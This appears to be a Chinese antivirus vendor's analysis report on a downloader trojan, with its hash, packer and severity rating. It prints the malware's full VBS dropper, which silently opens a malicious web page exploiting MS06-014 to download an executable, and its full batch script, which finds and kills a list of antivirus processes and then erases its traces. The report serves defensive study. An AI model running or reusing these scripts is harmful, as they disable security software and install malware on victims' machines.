一、 病毒标签:Trojan.BAT.KillAV.gx
病毒名称:
MD5: 0AA1285C6B4A0836491E3B6C4B3F0ED9
文件长度: 42.6 KB (43,641 字节)
公开范围: 完全公开
危害等级: C
加壳类型: UPX+自解压缩包壳
命名对照:
|
金山毒霸 |
2007.6.20.249 |
2008.2.27 |
2008-02-27 |
Win32.Troj.KillAV.gx.151552 |
3.756 |
二、 病毒描述:
该病毒为http://www.bebecu.com/self/kill.htm恶意网页所下载的病毒。释放BAT。VBS,等文件破坏主动防御及杀毒软件。
三、 行为分析:
该样本为自解压缩包,使用以下命令进行自动解压执行程序:
;下面的注释包含自解压脚本命令
Path=%systemroot%\temp
SavePath
Setup=kill.vbs
Silent=1
Overwrite=1
释放kill.bat,kill.vbs, knlps.exe至TEMP文件夹。
释放后执行VBS文件,内容如下:
set ws=wscript.createobject("wscript.shell")
ws.run "%systemroot%\temp\kill.bat",0
wscript.sleep 10000
Ws.run "IEXPLORE.EXE http://www.sokuoo.com/self/2.htm",0
访问2.htm,该网页为MS06014漏洞网页,下载http://cj.sokuoo.com/self/dl.exe
该病毒为下载者。
VBS还运行了kill.bat。该BAT内容如下:
@echo off
knlps.exe -l >PID.txt
findstr /i "RavMon.exe" PID.txt >>rav.txt
findstr /i "RavMonD.exe" PID.txt >>rav.txt
findstr /i "CCenter.exe" PID.txt >>rav.txt
findstr /i "avp.exe" PID.txt >>rav.txt
findstr /i "avp.exe" PID.txt >>rav.txt
findstr /i "KVMonXP.kxp" PID.txt >>rav.txt
findstr /i "KVxp.kxp" PID.txt >>rav.txt
findstr /i "kvsrvxp.exe" PID.txt >>rav.txt
findstr /i "kvwsc.exe" PID.txt >>rav.txt
findstr /i "KAVStart.exe" PID.txt >>rav.txt
findstr /i "KWatch.exe" PID.txt >>rav.txt
findstr /i "KPFW32.exe" PID.txt >>rav.txt
findstr /i "KPFWSvc.exe" PID.txt >>rav.txt
findstr /i "rfwsrv.exe" PID.txt >>rav.txt
findstr /i "rfwproxy.exe" PID.txt >>rav.txt
findstr /i "rfwmain.exe" PID.txt >>rav.txt
findstr /i "Navapw32.exe" PID.txt >>rav.txt
findstr /i "Navapsvc.exe" PID.txt >>rav.txt
findstr /i "rising.exe" PID.txt >>rav.txt
findstr /i "Symantec.exe" PID.txt >>rav.txt
findstr /i "rtvscan.exe" PID.txt >>rav.txt
findstr /i "ccApp.exe" PID.txt >>rav.txt
findstr /i "VTPRay.exe" PID.txt >>rav.txt
findstr /i "360tray.exe" PID.txt >>rav.txt
for /f "eol=; tokens=1 delims= " %%1 in (rav.txt) do knlps.exe -k %%1
::=========清除痕迹============================
RD /S /Q %systemroot%\temp\
del %0
获取以上进程的PID值然后使用knlps.exe关闭进程。以此来破坏主动防御以及杀毒软件,让下载者可以顺利进驻系统运作。
最后清除TEMP目录下的文件。
解决方案:
屏蔽www.sokuoo.com及cj.sokuoo.com
注:%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:\Winnt\System32,windows95/98/me中默认的安装路径是C:\Windows\System,windowsXP中默认的安装路径是C:\Windows\System32。
%Temp% = C:\Documents and Settings\AAAAA\Local Settings\Temp 当前用户TEMP缓存变量
%Windir%\ WINDODWS所在目录
%DriveLetter%\ 逻辑驱动器根目录
%ProgramFiles%\ 系统程序默认安装目录
%HomeDrive% = C:\ 当前启动的系统的所在分区
%Documents and Settings%\ 当前用户文档根目录
A级
大面积感染流行,并具有以下条件中的任意一个给网络造成严重压力、开有后门、反制AV技术。
B级
有一定的感染流行面积,或者有鲜明的技术特点值得进一步关注,或为既往A级蠕虫比较成熟的变种
C级
有少量感染流行,或虽然有一定感染流行面积,但是既往B级蠕虫变种。
D级
有极少量感染流行,但有一定潜在威胁。
E级
没有发现感染流行。
